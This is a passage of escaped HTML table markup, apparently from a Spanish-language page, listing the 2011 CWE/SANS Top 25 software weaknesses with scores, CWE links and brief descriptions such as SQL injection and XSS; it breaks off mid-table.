10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;ID&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;    &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;    &lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Descripción&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;/tr&gt;
&lt;/thead&gt;  &lt;tbody&gt;
&lt;tr style="mso-yfti-irow: 1;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[1]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;93.8&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-89"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-89&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No filtrar propiamente las sentencias SQL   (Inyección SQL)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 2;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[2]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;83.3&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-78"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-78&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No filtrar las llamadas al sistema de forma   adecuada (Inyección en comandos del SO)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 3;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[3]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;79.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-120"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-120&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No chequear el tamaño de la memoria   reservada a la hora de copiar datos (desbordamiento de memoria)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 4;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[4]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;77.7&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-79"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-79&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No detectar la inyección de scripting (XSS)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 5;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[5]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;76.9&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-306"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-306&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No autentificar en llamada a funciones   críticas&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 6;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[6]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;76.8&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-862"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-862&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No autorización&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 7;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[7]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;75.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-798"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-798&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Usar credenciales estáticos en el código&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 8;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[8]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;75.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-311"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-311&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No cifrado de datos sensibles&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 9;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[9]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;74.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-434"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-434&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No restringir la subida de ficheros a   ciertos formatos&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 10;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[10]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;73.8&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-807"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-807&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Confiar en una fuente de datos no confiable   a la hora de tomar una decisión de seguridad&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 11;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[11]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;73.1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-250"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-250&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Ejecución con privilegios innecesarios&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 12;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[12]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;70.1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-352"&gt;&lt;span style="color: #376092; 